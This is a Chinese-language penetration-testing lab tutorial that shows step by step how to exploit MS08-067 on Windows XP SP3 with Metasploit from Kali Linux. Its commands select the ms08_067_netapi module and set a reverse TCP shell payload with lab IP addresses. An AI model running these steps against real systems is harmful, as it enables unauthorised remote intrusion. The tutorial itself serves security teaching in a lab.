MS08-067漏洞渗透攻击过程

实验环境
kali linux2.0
win-xp sp3

操作步骤
1.在kali linux 命令行执行

msfconsole		#打开msf控制台

MS08-067漏洞渗透攻击过程_第1张图片
2.查询ms08067漏洞

search ms08-067

在这里插入图片描述
3.使用exploit/windows/smb/ms08_067_netapi 并查看options

use exploit/windows/smb/ms08_067_netapi		
show options

MS08-067漏洞渗透攻击过程_第2张图片
4.使用拿shell的payload

show payload											#查看所有payload

MS08-067漏洞渗透攻击过程_第3张图片
5.

set payload windows/shell_reverse_tcp						#选择反弹shell

set rhosts 192.168.135.124                                  #设置目标主机IP

set lhost 192.168.135.138                     		        #设置本地主机IP

6.选择目标型号

show targets 									#查看可攻击机型
set target  34									#选择34

MS08-067漏洞渗透攻击过程_第4张图片
7.最后查看options
MS08-067漏洞渗透攻击过程_第5张图片
8直接运行

run						#利用payload

MS08-067漏洞渗透攻击过程_第6张图片
看到以上即试验成功。

你可能感兴趣的:(渗透测试)